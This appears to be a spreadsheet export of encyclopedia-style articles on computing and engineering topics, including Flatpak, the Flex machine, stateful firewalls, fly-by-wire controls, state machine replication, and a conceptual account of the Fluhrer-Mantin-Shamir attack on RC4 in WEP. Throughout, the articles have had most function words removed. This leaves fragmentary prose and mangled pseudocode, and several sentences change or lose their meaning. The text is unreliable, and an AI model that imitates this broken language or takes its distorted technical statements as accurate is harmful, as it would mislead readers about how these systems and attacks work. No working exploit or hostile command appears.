    <t>flatpak, formerly known xdg-app, utility software deployment package management linux. advertised offering sandbox environment users application software isolation rest system. features applications using flatpak need permissions access resources bluetooth, sound (with pulseaudio), network, files. these permissions defined maintainer flatpak added removed users system.another feature flatpak allows application developers directly provide updates users without going distributions, without package test application separately distribution.flathub, repository remote source flatpak terminology) located flathub.org, become facto standard getting applications packaged flatpak. packages added flathub administrators developers programs (though admins stated preference developer-submitted apps). although flathub facto source applications packaged flatpak, possible host flatpak repository independent flathub. support theoretically, flatpak apps installed existing linux distribution including installed windows subsystem linux compatibility layer. supported out-of-the-box here list distributions flatpak installed default: centos clear linux elementary endless fedora workstation fedora silverblue linux mint pop! pureos ubuntu mate zorin supported here list distributions flatpak installed default installed: almalinux alpine linux arch linux bodhi linux clear linux debian deepin endeavouros gentoo linux kaos neon kubuntu mageia manjaro linux nixos openmandriva opensuse pardus pclinuxos peppermint raspberry enterprise linux rocky linux solus sparkylinux ubuntu void linux zenwalkit also used linux kernel-based systems like chrome also appimage snap zero install references</t>
  </si>
  <si>
    <t>Flex machine</t>
  </si>
  <si>
    <t>flex computer system developed michael foster currie royal signals radar establishment (rsre) malvern, england, late 1970s 1980s. used tagged storage scheme implement capability architecture, designed safe efficient implementation strongly typed procedures. hardware custom microprogrammable, operating system, (modular) compiler, editor, garbage collector filing system written algol 68rs. there least) incarnations flex, implemented using hardware writable microcode. first supplied logica rsre design, second used perq. microcode alone responsible storage allocation, deallocation garbage collection. this immediately precluded whole class errors arising misuse (deliberate accidental) pointers. notable feature flex tagged, write-once filestore. this allowed arbitrary code data structures written retrieved transparently, without recourse external encodings. data could thus passed safely program program. similar way, remote capabilities allowed data procedures machines accessed network connection, without application program involved external encodings data, parameters result values. whole scheme allowed abstract data types safely implemented, data items procedures permitted access could bound together, resulting capability passed freely around. capability would grant access procedures, could used obtain access data. another notable feature flex notion shaky pointers, recently often called weak references, points blocks memory could freed next garbage collection. this used example cached disc blocks list spare procedure work-spaces.comflex, packet switching network capable transmitting data magnetic-disc speed, developed alongside flex. made feasible remote file-stores, remote capabilities, remote procedure calls. also royal radar establishment automatic computer ten15 ps-algol references further reading</t>
  </si>
  <si>
    <t>Static key</t>
  </si>
  <si>
    <t>cryptographic called static intended relatively long period time typically intended many instances cryptographic establishment scheme. contrast ephemeral key. also cryptographic types recommendation management part general, nist cryptographic toolkit</t>
  </si>
  <si>
    <t>Fli4l</t>
  </si>
  <si>
    <t>fli4l (flexible internet router linux; previously: floppy isdn linux) linux distribution, actively developed german developers since 2000. projects main task provide small linux system turns almost every machine router. distribution floppy disk created simple configuration support older hardware.fli4l route ethernet isdn, umts, ethernet networks. characteristics requirements fli4l based linux kernel. documentation extensive knowledge linux required, however basic knowledge network technology needed.the hardware requirements fli4l low, intel pentium support (depending upon configuration) network interface controllers quite adequate. hard disk drive required, used fli4l too.newer versions fli4l provide also possibility create working installation card card reader, card turn operate adapter slot. also generation image supported cd-rom well doc/dom embedded systems.fli4l configured linux, unix windows systems using text files.in addition, fli4l possibility encrypt connections internet wireless using openvpn pptp (poptop). versions there development branches fli4l, stable development version. present stable release based linux 3.16 kernel supports virtualization means kvm. wireless supported great extent well current embedded hardware apu, alix, soekris, epia series. development version also provides linux kernel. furthermore, implements management configuration layer connections (so-called circuits) designed ground allows multiple links (e.g. dsl, isdn, umts) parallel. optional packages fli4l modular system using so-called opt-packages. create individual configuration, software packages options, needed, downloaded unzipped directory tree. extend basic functionality, wide range applications available so-called opt-database; example, optional packages used monitoring traffic fli4l function printserver. this process easily allows developments, made available users opt-database. device control fli4l router controlled monitored browser-based interface. besides, program imonc (isdn monitor client) available windows linux (gtk). imonc allows extensive control well remote-controlled update router's software. references further reading schemberg, axel; linten, martin; surendorf, (2010). pc-netzwerke networks] german) (5th ed.). galileo computing. 422–440. isbn 978-3-8362-1105-5. schmidt, jürgen (2003). "report 300-euro-pc, router mehrwert" [report euro router value added]. german). heinz heise. 2003 (3): 84–93. retrieved march 2012. schmidt, jürgen (2003). "gut aufgelegt, internet-zugang linux richtig konfigurieren" good mood, internet access linux configured correctly]. german). heinz heise. 2003 (2): 184–185. retrieved march 2012. violka, karsten (2002). "virtuelle lan-party, netzwerkspiele vpn" [virtual party, online games using vpn]. german). heinz heise. 2002 (22): 218–222. diedrich, oliver (2002). "mit pinguin netz, fli4l macht aufsetzen eines linux-routers kinderspiel" [with penguin net, fli4l makes setup linux router child's play]. german). heinz heise. 2002 (7): 110–111. retrieved march 2012. kaps, reiko 2009). "schlankes router-linux" [slim linux router]. heise netze german). retrieved march 2012. "linux-router fli4l "stabiler version" erhältlich" [linux router fli4l available "stable version"]. heise online german). 2007. "linux-softwarerouter fli4l jetzt version 3.0" [linux software router fli4l version 3.0]. heise online german). 2005. external links official website heating system using 1-wire fli4l</t>
  </si>
  <si>
    <t>FlockDB</t>
  </si>
  <si>
    <t>flockdb open-source distributed, fault-tolerant graph database managing wide shallow network graphs. initially used twitter store relationships users, e.g. followings favorites. flockdb differs graph databases, e.g. neo4j designed multi-hop graph traversal rather rapid operations, unlike primary use-case redis sets. since still process packaged outside twitter use, code still rough hence stable release available yet. flockdb posted github shortly twitter released gizzard framework, uses query flockdb distributed datastore. database licensed apache license.twitter longer supports flockdb. also gizzard (scala framework) references external links official website</t>
  </si>
  <si>
    <t>Flooded engine</t>
  </si>
  <si>
    <t>flooded engine internal combustion engine excessively rich air-fuel mixture cannot ignited. this caused mixture exceeding upper explosive limit particular fuel. engine condition start excessively rich mixture cleared. also possible engine stall running state condition. engine flooding common problem carbureted cars, newer fuel-injected ones immune problem operating within normal tolerances. flooding usually occurs starting, especially cold conditions accelerator pumped. also occur starting; high temperatures cause fuel carburetor float chamber evaporate inlet manifold, causing air/fuel mixture exceed upper explosive limit. high temperature fuel also result vapor lock, unrelated flooding similar symptom. severe form engine flooding occurs excessive liquid fuel enters combustion chamber. this reduces dead volume combustion chamber thus places heavy load starter motor, fails turn engine. damage (due excessive compression even dilution lubricating fuel) also occur. this condition known engine "flooding out." possible causes much liquid fuel engine include defective carburetor float closing fuel inlet needle valve, debris caught needle valve preventing sealing. liquids inside internal combustion engine extremely detrimental compressibility liquids. although common cause, severely flooded engine could result hydrolock. hydrolock occurs liquid fills combustion chamber point impossible turn crankshaft without catastrophic failure engine vital components. conventional remedy flooded carbureted engine steadily hold throttle full open (full power position) continuing crank engine. this permits maximum flow engine, flushing overly rich fuel mixture exhaust. exhaust system enough autoignite, after-fire result; seen flame discharging exhaust system. fuel-injected engine, ignoring throttle fuel) starting permits electronic logic systems produce correct fuel mixture, often based exhaust gases. some fuel injection computers interpret "pumping" throttle indicate flooded engine, alter fuel-air mixture accordingly. carbureted engine equipped accelerator pump (which advances fuel flow match ingestion rapid throttle acceleration), "pumping" throttle force excess fuel engine, flooding worst cases, excess fuel foul spark plugs, sometimes necessitating cleaning replacement engine start. this likely occur carbureted engine cold weather, running engine shut briefly restarted. doing cause choke valve configure mixture cold engine start, despite higher actual temperatures, resulting overly rich mixture flooded engine. also vapor lock references</t>
  </si>
  <si>
    <t>Floppyfw</t>
  </si>
  <si>
    <t>floppyfw linux distribution running busybox provide firewall/gateway/router single bootable floppy disk, later available format.reviews concluded simple reliable gateway/firewall could established small medium-sized networks cost ease. independent study concluded best possible security provided floppy-based firewall" repurposing old, redundant hardware linux-based firewalls routers. requirements intel 80386sx better network interface cards 1.44mb floppy drive 12mbyte features floppyfw's features include: access lists ip-masquerading (network address translation) connection tracked packet filtering quite advanced routing traffic shaping pppoe very simple packaging system. used editors, ppp, vpn, traffic shaping whatever comes logging klogd/syslogd, local remote serial support console serial port dhcp server cache internal networks references external links floppyfw main page</t>
  </si>
  <si>
    <t>FlowMon</t>
  </si>
  <si>
    <t>flowmon name monitoring probe result academic research activity cesnet also name commercial product marketed university spin-off company flowmon networks. flowmon probe result research activities flowmon probe appliance monitoring reporting information flows high-speed computer networks. probe developed liberouter team within scope cesnet research plan optical national research network applications, research activity programmable hardware. flowmon probe built upon pair programmable network cards, called combo, host computer linux operating system. pair combo cards consists main card pci, pci-x pci-express connector connection motherboard host computer add-on card network interfaces. both cards contain programmable chips (fpgas) able process high amount data multi-gigabit speed. flow monitoring process split hardware (acceleration cards) application software running host computer. following principle hardware/software codesign, time-critical tasks implemented fpga chips acceleration cards complex operations carried application software. this concept enables monitoring modern high-speed gbps, gbps) networks packet loss necessity input sampling. time, flexible user-friendly interface provided software. flowmon probe passive monitoring device, i.e. alter passing traffic way. therefore, detection hardly possible. when connected network, flowmon probe observes passing traffic/packets, extracts aggregates information flows flow records. flowmon probe able export aggregated data external collectors netflow (version ipfix format. collectors collect incoming flow records store automated manual visual analysis (automated malicious traffic detection, filter rules, graphs statistical schemas). whole system allows monitoring actual state monitored network well long-term traffic analysis. flowmon probe part géant2 security toolset, consists netflow analysis tools nfsen nfdump flowmon appliance. flowmon solution commercial product flowmon network traffic monitoring security solution flowmon networks company. flowmon networks established 2007 university spin-off, made technology transfer cesnet (czech nren) continue r&amp;d, finish prototypes market. flowmon solution initially based flowmon probes developed cesnet. nowadays flowmon complete flow monitoring solution consists flowmon probes, flowmon collectors additional modules flowmon ads, flowmon apm, flowmon ddos defender, flowmon traffic recorder. flowmon probes provide netflow/ipfix statistics network traffic come standard version suitable standard networks (10mbit/s 10gbit/s) hardware-accelerated version based cesnet's fpga boards suitable high-speed networks (10gbit/s 100gbit/s). flowmon collectors appliances netflow/sflow/ipfix/jflow/netflow lite/net stream/cflowd storage analysis. flowmon modules extend functionality flowmon probes flowmon collectors brings additional functionality e.g. network behavior analysis (nba), application performance monitoring, anomaly detection, http logging. also network traffic measurement flow information export netflow external sources flexible flowmon technical report user test report netflow probe (dj2.2.2,2) géant2 liberouter project page cesnet page géant2 security toolset flowmon probe description flowmon network monitoring security solution</t>
  </si>
  <si>
    <t>Fluentd</t>
  </si>
  <si>
    <t>fluentd cross platform open-source data collection software project originally developed treasure data. written primarily ruby programming language. overview fluentd positioned "big data", semi- un-structured data sets. analyzes event logs, application logs, clickstreams. according suonsyrjä mikkonen, "core idea fluentd unifying layer different types inputs outputs.", fluentd available linux, osx, windows. history fluentd created sadayuki furuhashi project mountain view-based firm treasure data. written primarily ruby, source code released open-source software october 2011. company announced million funding 2013. treasure data sold ltd. 2018. users fluentd data collection tools recommended amazon services 2013, said similar apache flume scribe. google cloud platform's bigquery recommends fluentd default real-time data-ingestion tool, uses google's customized version fluentd, called google-fluentd, default logging agent. fluent fluent processor forwarder developed cncf project umbrella fluentd project. fluentd written ruby built ruby consumes amount memory resources. hand, since fluent written dependencies, consumed memory usage much decreased compared fluentd makes easy embedded linux container environment. references further reading goasguen, sébastien (2014). recipes apache cloudstack: using cloudstack ecosystem, "chapter advanced recipes". o'reilly media. isbn 1491910127 wilkins, phil (2022). logging action, with fluentd, kubernetes more. manning. isbn 9781617298356 external links official website source code github</t>
  </si>
  <si>
    <t>Fluhrer, Mantin and Shamir attack</t>
  </si>
  <si>
    <t>cryptography, fluhrer, mantin shamir attack stream cipher attack widely used stream cipher. attack allows attacker recover encrypted stream large number messages stream. fluhrer, mantin shamir attack applies specific derivation methods, apply general rc4-based (tls), since generates encryption keys uses hashing, meaning different sessions unrelated keys. however, closely related mitzvah attack, based research revealed 2015, exploit cases weak keys generated keying process. background fluhrer, mantin shamir (fms) attack, published 2001 paper "weaknesses scheduling algorithm rc4", takes advantage weakness scheduling algorithm reconstruct encrypted messages. attack gained popularity network attack tools including airsnort, weplab, aircrack, recover used protected wireless networks. this discussion scheduling algorithm (ksa). begin ksa(with keylength, byte key[keylength]) s[i] endfor s[i] key[i keylength]) swap(s[i],s[j]) endfor following pseudo-random generation algorithm (prga) also used. begin prga(with byte s[256]) generatingoutput: s[i]) swap(s[i],s[j]) output s[(s[i] s[j]) 256] endwhile attack basis attack lies weak initialization vectors (ivs) used rc4. encrypts byte time keystream output prga(); uses initialize state machine ksa(), continuously modifies state generates byte keystream state. theoretically, stream functions random one-time pad, pseudo-random number generator controls output step. with certain ivs, attacker knowing first byte keystream first bytes derive 1)th byte weakness prng used generate keystream. because first byte plaintext comes snap header, attacker assume derive first byte keystream 0xaa (the snap header almost always 0xaa). from there, needs form index equal element value space equal (since bits make byte), start, attacker needs 255, uses 24-bit ivs, making value byte long. start, attacker utilizes first elements fills s-box sequential values initializing s-box known performs first iterations ksa() begin initializing s-box. after third step, attacker possibly, definitely, derive fourth byte using keystream output computing s[i]) k[i], value step. point, attacker fourth byte key. this algorithm regenerate next byte key; generates possible value key. collecting multiple messages—for example packets—and repeating steps, attacker generate number different possible values. correct value appears significantly frequently other; attacker determine value recognizing value selecting next byte. point, start attack fifth byte key. although attacker cannot attack words order, store messages later sequential attack later words knows earlier words. again, needs messages weak ivs, discard others. through process, gather large number messages attack entire key; fact, store short portion beginning messages, enough carry attack word allow attack. references also mitzvah attack</t>
  </si>
  <si>
    <t>Stateful firewall</t>
  </si>
  <si>
    <t>computing, stateful firewall network-based firewall individually tracks sessions network connections traversing stateful packet inspection, also referred dynamic packet filtering, security feature often used non-commercial business networks. description stateful firewall keeps track state network connections, streams, datagrams, icmp messages, apply labels listen, established, closing. state table entries created streams datagrams allowed communicate firewall accordance configured security policy. once table, related packets stored session streamlined allowed, taking fewer cycles standard inspection. related packets also permitted return firewall even rule configured allow communications host. traffic seen specified time (implementation dependent), connection removed state table. applications send keepalive messages periodically prevent firewall dropping connection periods activity applications design long periods silence. method maintaining session's state depends transport protocol used. connection oriented protocol sessions established three-way handshake using packets ended sending notification. firewall unique connection identifiers know remove session state table without waiting timeout. connectionless protocol, means send unique connection related identifiers communicating. because that, session removed state table configured time-out. hole punching technology leverages trait allow dynamically setting data tunnels internet. icmp messages distinct communicate control information network itself. well known example ping utility. icmp responses allowed back firewall. scenarios, communication icmp provide information state session icmp responses related session also allowed back through. also computer security netfilter references</t>
  </si>
  <si>
    <t>Fly-by-wire</t>
  </si>
  <si>
    <t>fly-by-wire (fbw) system replaces conventional manual flight controls aircraft electronic interface. movements flight controls converted electronic signals transmitted wires, flight control computers determine move actuators control surface provide ordered response. mechanical flight control backup systems (like boeing 777) fully fly-by-wire controls.improved fully fly-by-wire systems interpret pilot's control inputs desired outcome calculate control surface positions required achieve outcome; results various combinations rudder, elevator, aileron, flaps engine controls different situations using closed feedback loop. pilot fully aware control outputs acting effect outcome, aircraft reacting expected. fly-by-wire computers stabilise aircraft adjust flying characteristics without pilot's involvement prevent pilot operating outside aircraft's safe performance envelope. rationale mechanical hydro-mechanical flight control systems relatively heavy require careful routing flight control cables aircraft systems pulleys, cranks, tension cables hydraulic pipes. both systems often require redundant backup deal failures, increases weight. both limited ability compensate changing aerodynamic conditions. dangerous characteristics stalling, spinning pilot-induced oscillation (pio), depend mainly stability structure aircraft concerned rather control system itself, dependent pilot's actions.the term "fly-by-wire" implies purely electrically signaled control system. used general sense computer-configured controls, computer system interposed operator final control actuators surfaces. this modifies manual inputs pilot accordance control parameters.side-sticks conventional flight control yokes used aircraft. weight saving aircraft lighter similar design conventional controls. this partly lower overall weight system components partly natural stability aircraft relaxed, slightly transport aircraft, maneuverable fighter, means stability surfaces part aircraft structure therefore made smaller. these include vertical horizontal stabilizers (fin tailplane) (normally) rear fuselage. structures reduced size, airframe weight reduced. advantages controls first exploited military commercial airline market. airbus series airliners used full-authority controls beginning a320 series, a320 flight control (though limited functions existed a310). boeing followed later designs. basic operation closed-loop feedback control pilot commands flight control computer make aircraft perform certain action, pitch aircraft roll side, moving control column sidestick. flight control computer calculates control surface movements cause plane perform action issues commands electronic controllers surface. controllers surface receive commands move actuators attached control surface moved flight control computer commanded controllers measure position flight control surface sensors lvdts. automatic stability systems fly-by-wire control systems allow aircraft computers perform tasks without pilot input. automatic stability systems operate way. gyroscopes sensors accelerometers mounted aircraft sense rotation pitch, roll axes. movement (from straight level flight example) results signals computer, automatically move control actuators stabilize aircraft. safety redundancy while traditional mechanical hydraulic control systems usually fail gradually, loss flight control computers immediately renders aircraft uncontrollable. reason, fly-by-wire systems incorporate either redundant computers (triplex, quadruplex etc.), kind mechanical hydraulic backup combination both. "mixed" control system mechanical backup feedbacks rudder elevation directly pilot therefore makes closed loop (feedback) systems senseless.aircraft systems quadruplexed (four independent channels) prevent loss signals case failure even channels. high performance aircraft fly-by-wire controls (also called ccvs control-configured vehicles) deliberately designed even negative stability flight regimes rapid-reacting controls electronically stabilize lack natural stability.pre-flight safety checks fly-by-wire system often performed using built-in test equipment (bite). number control movement steps automatically performed, reducing workload pilot groundcrew speeding flight-checks.some aircraft, panavia tornado example, retain basic hydro-mechanical backup system limited flight control capability losing electrical power; case tornado allows rudimentary control stabilators pitch roll axis movements. history servo-electrically operated control surfaces first tested 1930s soviet tupolev ant-20. long runs mechanical hydraulic connections replaced wires electric servos. 1934, karl otto altvater filed patent automatic-electronic system, flared aircraft, close ground.in 1941, engineer siemens, karl otto altvater developed tested first fly-by-wire system heinkel 111, aircraft fully controlled electronic impulses.the first non-experimental aircraft designed flown 1958) fly-by-wire flight control system avro canada cf-105 arrow, feat repeated production aircraft (though arrow cancelled five built) concorde 1969, became first fly-by-wire airliner. this system also included solid-state components system redundancy, designed integrated computerised navigation automatic search track radar, flyable ground control data uplink downlink, provided artificial feel (feedback) pilot.the first pure electronic fly-by-wire aircraft mechanical hydraulic backup apollo lunar landing training vehicle (lltv), first flown 1968. this preceded 1964 lunar landing research vehicle (llrv) pioneered fly-by-wire flight mechanical backup. control digital computer three analog redundant channels. ussr, sukhoi also flew. time united kingdom trainer variant british hawker hunter fighter modified british royal aircraft establishment fly-by-wire flight controls right-seat pilot. seater avro 707c flown fairey system mechanical backup early mid-60s. program curtailed air-frame flight time.in 1972, first digital fly-by-wire fixed-wing aircraft without mechanical backup take crusader, modified electronically nasa united states test aircraft; used apollo guidance, navigation control hardware.the airbus a320 began service 1988 first airliner digital fly-by-wire controls. analog systems "fly-by-wire" flight control systems eliminate complexity, fragility weight mechanical circuit hydromechanical electromechanical flight control systems replaced electronic circuits. control mechanisms cockpit operate signal transducers, turn generate appropriate electronic commands. these next processed electronic controller—either analog one, (more modernly) digital one. aircraft spacecraft autopilots part electronic controller.the hydraulic circuits similar except mechanical servo valves replaced electrically controlled servo valves, operated electronic controller. this simplest earliest configuration analog fly-by-wire flight control system. configuration, flight control systems must simulate "feel". electronic controller controls electrical feel devices provide appropriate "feel" forces manual controls. this used concorde, first production fly-by-wire airliner. digital systems digital fly-by-wire flight control system extended analog counterpart. digital signal processing receive interpret input multiple sensors simultaneously (such altimeters pitot tubes) adjust controls real time. computers sense position force inputs pilot controls aircraft sensors. they solve differential equations related aircraft's equations motion determine appropriate command signals flight controls execute intentions pilot.the programming digital computers enable flight envelope protection. these protections tailored aircraft's handling characteristics stay within aerodynamic structural limitations aircraft. example, computer flight envelope protection mode prevent aircraft handled dangerously preventing pilots exceeding preset limits aircraft's flight-control envelope, prevent stalls spins, limit airspeeds forces airplane. software also included stabilize flight-control inputs avoid pilot-induced oscillations.since flight-control computers continuously feedback environment, pilot's workloads reduced. this also enables military aircraft relaxed stability. primary benefit aircraft maneuverability combat training flights, so-called "carefree handling" stalling, spinning undesirable performances prevented automatically computers. digital flight control systems enable inherently unstable combat aircraft, lockheed f-117 nighthawk northrop grumman spirit flying wing usable safe manners. legislation federal aviation administration (faa) united states adopted rtca/do-178c, titled "software considerations airborne systems equipment certification", certification standard aviation software. safety-critical component digital fly-by-wire system including applications laws aeronautics computer operating systems need certified do-178c level depending class aircraft, applicable preventing potential catastrophic failures.nevertheless, concern computerized, digital, fly-by-wire systems reliability, even analog electronic control systems. this digital computers running software often control path pilot aircraft's flight control surfaces. computer software crashes reason, pilot unable control aircraft. hence virtually fly-by-wire flight control systems either triply quadruply redundant computers electronics. these three four flight-control computers operating parallel three four separate data buses connecting control surface. redundancy multiple redundant flight control computers continuously monitor other's output. computer begins give aberrant results reason, potentially including software hardware failures flawed input data, combined system designed exclude results computer deciding appropriate actions flight controls. depending specific system details potential reboot aberrant flight control computer, reincorporate inputs return agreement. complex logic exists deal multiple failures, prompt system revert simpler back-up modes.in addition, early digital fly-by-wire aircraft also analog electrical, mechanical, hydraulic back-up flight control system. space shuttle had, addition redundant four digital computers running primary flight-control software, fifth back-up computer running separately developed, reduced-function, software flight-control system could commanded take event fault ever affected computers four. this back-up system served reduce risk total flight-control-system failure ever happening general-purpose flight software fault escaped notice four computers. efficiency flight airliners, flight-control redundancy improves safety, fly-by-wire control systems, physically lighter lower maintenance demands conventional controls also improve economy, terms cost ownership in-flight economy. certain designs limited relaxed stability pitch axis, example boeing 777, flight control system allow aircraft aerodynamically efficient angle attack conventionally stable design. modern airliners also commonly feature computerized full-authority digital engine control systems (fadecs) control engines, inlets, fuel storage distribution system, similar fashion controls flight control surfaces. this allows engine output continually varied efficient usage possible.the second generation embraer e-jet family gained 1.5% efficiency improvement first generation fly-by-wire system, enabled reduction ft.² ft.² horizontal stabilizer e190/195 variants. airbus/boeing airbus boeing differ approaches implementing fly-by-wire systems commercial aircraft. since airbus a320, airbus flight-envelope control systems always retain ultimate flight control flying normal permit pilots violate aircraft performance limits unless choose alternate law. this strategy continued subsequent airbus airliners. however, event multiple failures redundant computers, a320 mechanical back-up system pitch trim rudder, airbus a340 purely electrical (not electronic) back-up rudder control system beginning a380, flight-control systems back-up systems purely electrical "three-axis backup control module" (bcm).boeing airliners, boeing 777, allow pilots completely override computerised flight-control system, permitting aircraft flown outside usual flight-control envelope. applications concorde first production fly-by-wire aircraft analogue control. general dynamics f-16 first production aircraft digital fly-by-wire controls. space shuttle orbiter all-digital fly-by-wire control system. this system first exercised flight control system) glider unpowered-flight "approach landing tests" began space shuttle enterprise 1977. launched production 1984, airbus industries airbus a320 became first airliner all-digital fly-by-wire control system. 2005, dassault falcon became first business fly-by-wire controls. fully digital fly-by-wire without closed feedback loop integrated 2002 first generation embraer e-jet family. closing loop (feedback), second generation embraer e-jet family gained 1.5% efficiency improvement 2016. engine digital control advent fadec (full authority digital engine control) engines permits operation flight control systems autothrottles engines fully integrated. modern military aircraft systems autostabilization, navigation, radar weapons system integrated flight control systems. fadec allows maximum performance extracted aircraft without fear engine misoperation, aircraft damage high pilot workloads.in civil field, integration increases flight safety economy. airbus fly-by-wire aircraft protected dangerous situations low-speed stall overstressing flight envelope protection. result, conditions, flight control systems commands engines increase thrust without pilot intervention. economy cruise modes, flight control systems adjust throttles fuel tank selections precisely. fadec reduces rudder drag needed compensate sideways flight unbalanced engine thrust. a330/a340 family, fuel transferred main (wing center fuselage) tanks fuel tank horizontal stabilizer, optimize aircraft's center gravity cruise flight. fuel management controls keep aircraft's center gravity accurately trimmed fuel weight, rather drag-inducing aerodynamic trims elevators. further developments fly-by-optics fly-by-optics sometimes used instead fly-by-wire offers higher data transfer rate, immunity electromagnetic interference lighter weight. cases, cables changed electrical optical fiber cables. sometimes referred "fly-by-light" fiber optics. data generated software interpreted controller remain same. fly-by-light effect decreasing electro-magnetic disturbances sensors comparison common fly-by-wire control systems. kawasaki first production aircraft world equipped flight control system. power-by-wire having eliminated mechanical transmission circuits fly-by-wire flight control systems, next step eliminate bulky heavy hydraulic circuits. hydraulic circuit replaced electrical power circuit. power circuits power electrical self-contained electrohydraulic actuators controlled digital flight control computers. benefits digital fly-by-wire retained since power-by-wire components strictly complementary fly-by-wire components. biggest benefits weight savings, possibility redundant power circuits tighter integration aircraft flight control systems avionics systems. absence hydraulics greatly reduces maintenance costs. this system used lockheed martin f-35 lightning airbus a380 backup flight controls. boeing airbus a350 also incorporate electrically powered backup flight controls remain operational even event total loss hydraulic power. fly-by-wireless wiring adds considerable amount weight aircraft; therefore, researchers exploring implementing fly-by-wireless solutions. fly-by-wireless systems similar fly-by-wire systems, however, instead using wired protocol physical layer wireless protocol employed.in addition reducing weight, implementing wireless solution potential reduce costs throughout aircraft's life cycle. example, many failure points associated wire connectors eliminated thus hours spent troubleshooting wires connectors reduced. furthermore, engineering costs could potentially decrease less time would spent designing wiring installations, late changes aircraft's design would easier manage, etc. intelligent flight control system newer flight control system, called intelligent flight control system (ifcs), extension modern digital fly-by-wire flight control systems. intelligently compensate aircraft damage failure flight, automatically using engine thrust avionics compensate severe failures loss hydraulics, loss rudder, loss ailerons, loss engine, etc. several demonstrations made flight simulator cessna-trained small-aircraft pilot successfully landed heavily damaged full-size concept jet, without prior experience large-body aircraft. this development spearheaded nasa dryden flight research center. reported enhancements mostly software upgrades existing fully computerized digital fly-by-wire flight control systems. dassault falcon embraer legacy business jets flight computers partially compensate engine-out scenarios adjusting thrust levels control inputs, still require pilots respond appropriately. also aircraft flight control system france flight 296q drive wire flight control modes mil-std-1553, standard data fly-by-wire relaxed stability note references external links "fly-by-wire" 1972 flight article archive version</t>
  </si>
  <si>
    <t>State machine replication</t>
  </si>
  <si>
    <t>computer science, state machine replication (smr) state machine approach general method implementing fault-tolerant service replicating servers coordinating client interactions server replicas. approach also provides framework understanding designing replication management protocols. problem definition distributed service terms clients services. each service comprises servers exports operations clients invoke making requests. although using single, centralized server simplest implement service, resulting service fault tolerant processor executing server. level fault tolerance unacceptable, multiple servers fail independently used. usually, replicas single server executed separate processors distributed system, protocols used coordinate client interactions replicas. state machine subsequent discussion state machine defined following tuple values (see also mealy machine moore machine): states inputs outputs transition function (input state state) output function (input state output) distinguished state called start.a state machine begins state labeled start. each input received passed transition output function produce state output. state held stable input received, output communicated appropriate receiver. this discussion requires state machine deterministic: multiple copies state machine begin start state, receiving inputs order arrive state generated outputs. typically, systems based state machine replication voluntarily restrict implementations finite-state machines simplify error recovery. fault tolerance determinism ideal characteristic providing fault-tolerance. intuitively, multiple copies system exist, fault would noticeable difference state output others. little deduction shows minimum number copies needed fault-tolerance three; fault, others compare state output. copies enough tell copy faulty one. further deduction shows three-copy system support failure (after must repair replace faulty copy). copies fail, three states outputs might differ, would choose correct one. general, system supports failures must 2f+1 copies (also called replicas). extra copies used evidence decide copies correct faulty. special cases improve bounds.all deduction pre-supposes replicas experiencing random independent faults memory errors hard-drive crash. failures caused replicas attempt lie, deceive, collude also handled state machine approach, isolated changes. failed replicas required stop; continue operating, including generating spurious incorrect outputs. special case: fail-stop theoretically, failed replica guaranteed stop without generating outputs, replicas required, clients accept first output generated system. existing systems achieve limit, often used analyzing systems built fault-tolerant layer (since fault-tolerant layer provides fail-stop semantics layers it). special case: byzantine failure faults replica sends different values different directions (for instance, correct output fellow replicas incorrect outputs others) called byzantine failures. byzantine failures random, spurious faults, malicious, intelligent attacks. 2f+1 replicas, non-cryptographic hashes suffices survive non-malicious byzantine failures (with high probability). malicious attacks require cryptographic primitives achieve 2f+1 (using message signatures), non-cryptographic techniques applied number replicas must increased 3f+1. state machine approach preceding intuitive discussion implies simple technique implementing fault-tolerant service terms state machine: place copies state machine multiple, independent servers. receive client requests, interpreted inputs state machine. choose ordering inputs. execute inputs chosen order server. respond clients output state machine. monitor replicas differences state output.the remainder article develops details technique. step outside scope article. step critical operation, ordering inputs. step covered state machine definition. step sending outputs. step auditing failure detection.the appendix contains discussion typical extensions used real-world systems logging, checkpoints, reconfiguration, state transfer. ordering inputs critical step building distributed system state machines choosing order inputs processed. since non-faulty replicas arrive state output given inputs, imperative inputs submitted equivalent order replica. many solutions proposed literature.a visible channel communication path entities actively participating system (such clients servers). example: client server, server server hidden channel communication path revealed system. example: client client channels usually hidden; users communicating telephone, process writing files disk read another process. when communication paths visible channels hidden channels exist, partial global order (causal order) inferred pattern communications. causal order derived independently server. inputs state machine executed causal order, guaranteeing consistent state output non-faulty replicas. open systems, hidden channels common weaker form ordering must used. order inputs defined using voting protocol whose results depend visible channels. problem voting single value group independent entities called consensus. extension, series values chosen series consensus instances. this problem becomes difficult participants communication medium experience failures.inputs ordered position series consensus instances (consensus order). consensus order derived independently server. inputs state machine executed consensus order, guaranteeing consistent state output non-faulty replicas. optimizing causal consensus ordering cases additional information available (such real-time clocks). cases, possible achieve efficient causal consensus ordering inputs, reduced number messages, fewer message rounds, smaller message sizes. references details further optimizations available semantics state machine operations accounted (such read write operations). references generalized paxos. sending outputs client requests interpreted inputs state machine, processed outputs appropriate order. each replica generate output independently. non-faulty replicas always produce output. before client response sent, faulty outputs must filtered out. typically, majority replicas return output, output sent response client. system failure majority replicas output, less majority replicas returns output, system failure occurred. client response must unique output: fail. auditing failure detection permanent, unplanned compromise replica called failure. proof failure difficult obtain, replica simply slow respond, even status.non-faulty replicas always contain state produce outputs. this invariant enables failure detection comparing states outputs replicas. typically, replica state output differs majority replicas declared faulty. common implementation pass checksums current replica state recent outputs among servers. audit process server restarts local replica deviation detected. cryptographic security required checksums. possible local server compromised, audit process faulty, replica continues operate incorrectly. this case handled safely output filter described previously (see sending outputs). appendix: extensions input system failures, inputs discarded processed state machine. realistic deployments must compensate transient non-failure behaviors system message loss, network partitions, slow processors.one technique store series inputs log. during times transient behavior, replicas request copies entry another replica order fill missing inputs.in general required persistent held memory). persistent compensate extended transient periods, support additional system features checkpoints, reconfiguration. checkpoints left unchecked grow exhausts available storage resources. continued operation, necessary forget entries. general entry forgotten contents longer relevant (for instance replicas processed input, knowledge input longer needed). common technique control size store duplicate state (called checkpoint), discard entries contributed checkpoint. this saves space duplicated state smaller size log. checkpoints added state machine supporting additional input called checkpoint. each replica maintains checkpoint addition current state value. when grows large, replica submits checkpoint command like client request. system ensure non-faulty replicas process command order, entries checkpoint discarded. system checkpoints, requests entries occurring checkpoint ignored. replicas cannot locate copies needed entry faulty must re-join system (see reconfiguration). reconfiguration reconfiguration allows replicas added removed system client requests continue processed. planned maintenance replica failure common examples reconfiguration. reconfiguration involves quitting joining. quitting when server detects state output faulty (see auditing failure detection), selectively exit system. likewise, administrator manually execute command remove replica maintenance. input added state machine called quit. replica submits command system like client request. 